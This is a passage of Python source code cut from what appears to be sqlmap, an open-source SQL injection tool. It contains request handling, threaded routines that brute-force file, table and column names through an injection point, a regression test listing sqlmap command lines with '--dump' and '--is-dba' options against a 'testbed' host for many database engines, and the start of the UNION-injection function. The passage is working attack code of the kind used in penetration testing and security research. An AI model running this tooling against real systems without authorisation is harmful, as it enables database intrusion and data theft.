Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(r"max.+connections", page or "", re.I) is not None kb.permissionFlag = re.search(r"(command|permission|access)\s*(was|is)?\s*denied", page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
def fileExists(pathFile): retVal = [] message = "which common files file do you want to use?\n" message += "[1] default '%s' (press Enter)\n" % pathFile message += "[2] custom" choice = readInput(message, default='1') if choice == '2': message = "what's the custom common files file location?\n" pathFile = readInput(message) or pathFile infoMsg = "checking files existence using items from '%s'" % pathFile logger.info(infoMsg) paths = getFileItems(pathFile, unique=True) kb.bruteMode = True try: conf.dbmsHandler.readFile(randomStr()) except SqlmapNoneDataException: pass except: kb.bruteMode = False raise threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(paths) threadData.shared.files = [] def fileExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: path = ntToPosixSlashes(paths[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break try: result = unArrayizeValue(conf.dbmsHandler.readFile(path)) except SqlmapNoneDataException: result = None kb.locks.io.acquire() if not isNoneValue(result): threadData.shared.files.append(result) if not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: '%s'\n" % (time.strftime("%X"), path) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: pushValue(logger.getEffectiveLevel()) logger.setLevel(logging.CRITICAL) runThreads(conf.threads, fileExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during file existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) finally: kb.bruteMode = False logger.setLevel(popValue()) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.files: warnMsg = "no file(s) found" logger.warn(warnMsg) else: retVal = threadData.shared.files return retVal
def tableExists(tableFile, regex=None): if kb.tableExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common table existence check" logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " kb.tableExistsChoice = readInput(message, default='N', boolean=True) if not kb.tableExistsChoice: return None result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) if result: errMsg = "can't use table existence check because of detected invalid results " errMsg += "(most likely caused by inability of the used injection " errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) pushValue(conf.db) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() message = "which common tables (wordlist) file do you want to use?\n" message += "[1] default '%s' (press Enter)\n" % tableFile message += "[2] custom" choice = readInput(message, default='1') if choice == '2': message = "what's the custom common tables file location?\n" tableFile = readInput(message) or tableFile infoMsg = "performing table existence using items from '%s'" % tableFile logger.info(infoMsg) tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) tables.extend(_addPageTextWords()) tables = filterListValue(tables, regex) for conf.db in (conf.db.split(',') if conf.db else [conf.db]): if conf.db: infoMsg = "checking database '%s'" % conf.db logger.info(infoMsg) threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(tables) threadData.shared.files = [] threadData.shared.unique = set() def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): fullTableName = "%s.%s" % (conf.db, table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.files.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, tableExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during table existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.files: warnMsg = "no table(s) found" if conf.db: warnMsg += " for database '%s'" % conf.db logger.warn(warnMsg) else: for item in threadData.shared.files: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) for _ in ((conf.db, item) for item in threadData.shared.files): if _ not in kb.brute.tables: kb.brute.tables.append(_) conf.db = popValue() hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) return kb.data.cachedTables
def columnExists(columnFile, regex=None): if kb.columnExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) warnMsg += "for common column existence check" logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " kb.columnExistsChoice = readInput(message, default='N', boolean=True) if not kb.columnExistsChoice: return None if not conf.tbl: errMsg = "missing table parameter" raise SqlmapMissingMandatoryOptionException(errMsg) if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.db = conf.db.upper() result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) if result: errMsg = "can't use column existence check because of detected invalid results " errMsg += "(most likely caused by inability of the used injection " errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) message = "which common columns (wordlist) file do you want to use?\n" message += "[1] default '%s' (press Enter)\n" % columnFile message += "[2] custom" choice = readInput(message, default='1') if choice == '2': message = "what's the custom common columns file location?\n" columnFile = readInput(message) or columnFile infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) columns = getFileItems(columnFile, unique=True) columns.extend(_addPageTextWords()) columns = filterListValue(columns, regex) table = safeSQLIdentificatorNaming(conf.tbl, True) if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) kb.threadContinue = True kb.bruteMode = True threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(columns) threadData.shared.files = [] def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.files.append(column) if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, columnExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during column existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) finally: kb.bruteMode = False clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.files: warnMsg = "no column(s) found" logger.warn(warnMsg) else: columns = {} for column in threadData.shared.files: if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE,): result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s NOT GLOB '*[^0-9]*')", (column, table, column))) else: result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = "numeric" else: columns[column] = "non-numeric" kb.data.cachedColumns[conf.db] = {conf.tbl: columns} for _ in ((conf.db, conf.tbl, item[0], item[1]) for item in columns.items()): if _ not in kb.brute.columns: kb.brute.columns.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) return kb.data.cachedColumns
def bedTest(): """ Runs the testing against 'testbed' """ TESTS = ( # MaxDB ("-u 'http://testbed/maxdb/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("Kernel____7.9.10___Build_003-123-265-343", "Database: DBADMIN", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'SAP MaxDB'", "the back-end DBMS is SAP MaxDB", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/maxdb/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("Kernel____7.9.10___Build_003-123-265-343", "Database: DBADMIN", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is SAP MaxDB", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/maxdb/get_int.php?id=1' --flush-session --technique=U --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Kernel____7.9.10___Build_003-123-265-343", "current database (equivalent to owner on SAP MaxDB): 'SYS'", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR |")), # Informix ("-u 'http://testbed/informix/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("retrieved: 47", "IBM Informix Dynamic Server Version 14.10.FC2DE", "Database: testdb", "Table: users", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "back-end DBMS could be 'Informix'", "the back-end DBMS is Informix", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/informix/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("IBM Informix Dynamic Server Version 14.10.FC2DE", "current database: 'testdb'", "current user: '******'", "[1 column]", "| surname | varchar |")), # Altibase ("-u 'http://testbed/altibase/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-unknown-linux-gnu", "Database: SYS", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "back-end DBMS could be 'Altibase'", "the back-end DBMS is Altibase", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/altibase/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-unknown-linux-gnu", "Database: SYS", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is Altibase", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/altibase/get_int.php?id=1' --flush-session --technique=U --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("x86_64-unknown-linux-gnu", "current database (equivalent to owner on Altibase): 'SYS'", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR |")), # CockroachDB ("-u 'http://testbed/cockroachdb/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-unknown-linux-gnu", "CockroachDB fork", "Database: public", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "back-end DBMS could be 'PostgreSQL'", "the back-end DBMS is PostgreSQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/cockroachdb/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-unknown-linux-gnu", "CockroachDB fork", "Database: public", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is PostgreSQL", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/cockroachdb/get_int.php?id=1' --flush-session --technique=E --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-unknown-linux-gnu", "CockroachDB fork", "Database: public", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: PostgreSQL AND error-based", "the back-end DBMS is PostgreSQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/cockroachdb/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: PostgreSQL AND error-based", "Title: PostgreSQL > 8.1 stacked queries", "Title: PostgreSQL > 8.1 AND time-based blind", "Title: Generic UNION query (NULL) - 3 columns", "x86_64-unknown-linux-gnu", "current database (equivalent to schema on PostgreSQL): 'public'", "current user: '******'", "[1 column]", "| surname | varchar |")), # CrateDB ("-u 'http://testbed/cratedb/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("4.0.10", "Database: doc", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "back-end DBMS could be 'CrateDB'", "the back-end DBMS is CrateDB", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/cratedb/get_int.php?id=1' --flush-session --technique=B --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("4.0.10", "current database (equivalent to schema on CrateDB): 'doc'", "current user: '******'", "[1 column]", "| surname |")), # Drizzle ("-u 'http://testbed/drizzle/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("7.1.36-stable", "Drizzle fork", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'MySQL'", "the back-end DBMS is MySQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/drizzle/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("7.1.36-stable", "Drizzle fork", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is MySQL", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/drizzle/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: MySQL >= 5.0.12 AND time-based blind", "Title: Generic UNION query (NULL) - 3 columns", "7.1.36-stable", "current database: 'testdb'", "current user: '******'", "[1 column]", "| surname | VARCHAR |")), # Firebird ("-u 'http://testbed/firebird/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump --banner --sql-query=\"SELECT 'foobar'\"", ("banner: '2.5", "Table: USERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "possible DBMS: 'Firebird'", "the back-end DBMS is Firebird", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/firebird/get_int.php?id=1' --flush-session --technique=U --is-dba --dump --banner --sql-query=\"SELECT 'foobar'\"", ("banner: '2.5", "Table: USERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is Firebird", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/firebird/get_int.php?id=1' --flush-session --technique=U --hex --banner --current-user --search -C surname --answers='dump=n'", ("banner: '2.5", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR |")), # H2 ("-u 'http://testbed/h2/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("1.4.192", "Database: PUBLIC", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "back-end DBMS could be 'H2'", "the back-end DBMS is H2", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/h2/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("1.4.192", "Database: PUBLIC", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is H2", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/h2/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: Generic inline queries", "Title: Generic UNION query (NULL) - 3 columns", "1.4.192", "current database (equivalent to schema on H2): 'PUBLIC'", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR |")), # HSQLDB ("-u 'http://testbed/hsqldb/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("2.3.4", "Database: PUBLIC", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'HSQLDB'", "the back-end DBMS is HSQLDB", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/hsqldb/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("2.3.4", "Database: PUBLIC", "Table: TESTUSERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is HSQLDB", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/hsqldb/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: HSQLDB > 2.0 AND time-based blind (heavy query)", "Title: Generic UNION query (NULL) - 3 columns", "2.3.4", "current database (equivalent to schema on HSQLDB): 'PUBLIC'", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR |")), # IBM DB2 ("-u 'http://testbed/db2/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("banner: 'DB2 v", "Database: DB2INST1", "Table: USERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'IBM DB2'", "the back-end DBMS is IBM DB2", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/db2/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("banner: 'DB2 v", "Database: DB2INST1", "Table: USERS", "5 entries", "ID", "NAME", "SURNAME", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is IBM DB2", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/db2/get_int.php?id=1' --flush-session --technique=U --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("banner: 'DB2 v", "current database (equivalent to owner on IBM DB2): 'DB2INST1'", "current user: '******'", "[1 column]", "| SURNAME | VARCHAR(1000) |")), # MariaDB ("-u 'http://testbed/mariadb/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("10.4.12-MariaDB-1:10.4.12+maria~bionic", "MariaDB fork", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'MySQL'", "the back-end DBMS is MySQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mariadb/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("10.4.12-MariaDB-1:10.4.12+maria~bionic", "MariaDB fork", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is MySQL", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mariadb/get_int.php?id=1' --flush-session --technique=E --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("10.4.12-MariaDB-1:10.4.12+maria~bionic", "MariaDB fork", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: MySQL >= 5.0 AND error-based", "the back-end DBMS is MySQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mariadb/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: MySQL >= 5.0 AND error-based", "Title: MySQL >= 5.0.12 AND time-based blind", "Title: Generic UNION query (NULL) - 3 columns", "10.4.12-MariaDB-1:10.4.12+maria~bionic", "current database: 'testdb'", "current user: '******'", "[1 column]", "| surname | varchar(1000) |")), # MySQL ("-u 'http://testbed/mysql/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("8.0.19", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'MySQL'", "the back-end DBMS is MySQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mysql/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("8.0.19", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is MySQL", "appears to have 3 columns", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mysql/get_int.php?id=1' --flush-session --technique=E --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("8.0.19", "Database: testdb", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: MySQL >= 5.0 AND error-based", "the back-end DBMS is MySQL", "current user is DBA: True", ": 'foobar'")), ("-u 'http://testbed/mysql/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: MySQL >= 5.1 AND error-based", "Title: MySQL >= 5.0.12 AND time-based blind", "Title: Generic UNION query (NULL) - 3 columns", "8.0.19", "current database: 'testdb'", "current user: '******'", "[1 column]", "| surname | varchar(1000) |")), # PostgreSQL ("-u 'http://testbed/postgresql/get_int.php?id=1' --flush-session --technique=B --is-dba --threads=4 --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-pc-linux-gnu", "Database: public", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Payload: id=1 AND ", "it looks like the back-end DBMS is 'PostgreSQL'", "the back-end DBMS is PostgreSQL", "current user is DBA: False", ": 'foobar'")), ("-u 'http://testbed/postgresql/get_int.php?id=1' --flush-session --technique=U --is-dba --dump -D CD --banner --sql-query=\"SELECT 'foobar'\"", ("x86_64-pc-linux-gnu", "Database: public", "Table: testusers", "5 entries", "id", "name", "surname", "luther", "blisset", "NULL", "Title: Generic UNION query (NULL) - 3 columns", "the back-end DBMS is PostgreSQL", "appears to have 3 columns", "current user is DBA: False", ": 'foobar'")), ("-u 'http://testbed/postgresql/get_int.php?id=1' --flush-session --hex --banner --current-user --current-db --search -C surname --answers='dump=n'", ("Title: AND boolean-based blind", "Title: PostgreSQL AND error-based", "Title: PostgreSQL > 8.1 stacked queries", "Title: PostgreSQL > 8.1 AND time-based blind", "Title: Generic UNION query (NULL) - 3 columns", "x86_64-pc-linux-gnu", "current database (equivalent to schema on PostgreSQL): 'public'", "current user: '******'", "[1 column]", "| surname | varchar |")), ) retVal = True count = 0 for options, checks in TESTS: status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS))) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) cmd = "%s %s %s --batch" % (sys.executable, os.path.abspath( os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), options) output = shellExec(cmd) if not all( (check in output if not check.startswith('~') else check[1:] not in output) for check in checks): for check in checks: if check not in output: print(cmd, check) dataToStdout("---\n\n$ %s\n" % cmd) dataToStdout("%s---\n" % clearColors(output)) retVal = False count += 1 clearConsoleLine() if retVal: logger.info("bed test final result: PASSED") else: logger.error("best test final result: FAILED") return retVal
def unionUse(expression, unpack=True, dump=False): """ This function tests for an UNION SQL injection on the target URL then call its subsidiary function to effectively perform an UNION SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if conf.api else None if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it expression = re.sub(r"(?i)\s*ORDER BY\s+[\w,]+", "", expression) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL) and expressionFields and not conf.binaryFields: match = re.search(r"SELECT\s*(.+?)\bFROM", expression, re.I) if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression): kb.jsonAggMode = True if Backend.isDbms(DBMS.MYSQL): query = expression.replace(expressionFields, 